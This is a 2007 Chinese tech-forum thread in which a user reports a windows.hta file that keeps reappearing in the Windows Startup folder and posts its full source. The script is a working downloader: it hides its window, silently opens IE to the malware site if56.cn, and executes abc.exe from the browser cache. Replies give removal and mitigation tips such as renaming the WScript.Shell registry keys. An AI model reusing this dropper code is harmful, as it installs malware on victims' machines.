windows.hta~~~~~[已解决]-|下有,文件夹,菜单,表里,路径|【电脑】用脑年代|工大后院

iptton 发表于 2007-6-11 12:28

windows.hta~~~~~[已解决]

C:\Documents and Settings\All Users\「开始」菜单\程序\启动
下一个文件： windows.hta

删了后重启又在了……
卡巴没有随系统启动

下面的网址路径，没有安杀软的不要轻易点，点了后果自负……

用记事本打开：

TG! 稈?蚕?_?    g 噎c?胂般?    ?幎雖?嶖_?
| ?等骪??Dw= ? ?"    I    ?幎雖?嶖_?    2 ' ? S U N N Y?       ?
??
<html>
<body>
<script>
window.moveTo(4000,4000);
window.resizeTo(0,0);
var shell=new ActiveXObject("wscript.shell");
shell.Run("C:\\Progra~1\\Intern~1\\IEXPLORE.EXE http://www.if56.cn/lo/downmm.html",0,0);
function runmm(){
var path=shell.SpecialFolders("MyDocuments");
var savepath=path.substring(0,path.lastIndexOf("\\"));
savepath+="\\Local Settings\\Temporary Internet Files\\Content.IE5\\";
var sp=new ActiveXObject("shell.application");

var Folders=sp.NameSpace(savepath);
for(i=0;i<Folders.Items().Count;i++){
   var Folder=Folders.Items().Item(i).Path;
   Folder+="\\abc.exe]\\abc.exe";
   try{
      shell.Exec(Folder);
   }catch(e){};
}

window.close();
};
shell.Run("cmd.exe /c tree c:\\ /f",0,1);
runmm();
</script>
</body>
</html>

红色那段代码可以遍历文件夹元素……学到了……

注册表里没有 if56.cn和 windows.hta 的项……

PS：之所以能够发现这个，并不是我常常去检查下有什么启动项，
而是每次关机前都把网络连接禁了(启动时这个做与不做，启动速度差很多……)

[ 本帖最后由 iptton 于 2007-6-11 13:48 编辑 ]

bluesmart 发表于 2007-6-11 13:16

好长的script

subomaoming 发表于 2007-6-11 13:21

你这个是不是会自动打开www.if56.cn这个网页阿，你修改下host,将那个网址删掉看看，
还有，全盘查毒，应该给下了不少木马
至于你那个卡巴，没有随系统打开，那么在开机后可以顺利运行吗？如果答案是否，多数是被映像劫持了，去注册表删除相应劫持项即可！

iptton 发表于 2007-6-11 13:35

卡巴没自动启动是因为我没让它自动启动……
读下SCRIPT就知道是打开网页，并马上移到视野外，又马上把大小改为零……

刚刚删了所有IE临时文件，重启，现在那个文件不在了……

iptton 发表于 2007-6-11 13:36

改什么host……
system32/drivers/etc/下那个文件？

跟这个有什么关系？？

[ 本帖最后由 iptton 于 2007-6-11 13:39 编辑 ]

iptton 发表于 2007-6-11 13:56

很久以前就见过这个……
都没有照做

这次要改改了……

WScript.Shell可以调用系统内核运行DOS基本命令

可以通过修改注册表，将此组件改名，来防止此类木马的危害。

HKEY_CLASSES_ROOT\WScript.Shell\
及
HKEY_CLASSES_ROOT\WScript.Shell.1\
改名为其它的名字，如：改为WScript.Shell_ChangeName或WScript.Shell.1_ChangeName

happyeveryday 发表于 2007-6-11 20:32

但是改了，会不会对其它的应用程序有影响？？？？

页: [1]

工大后院's Archiver

windows.hta~~~~~[已解决]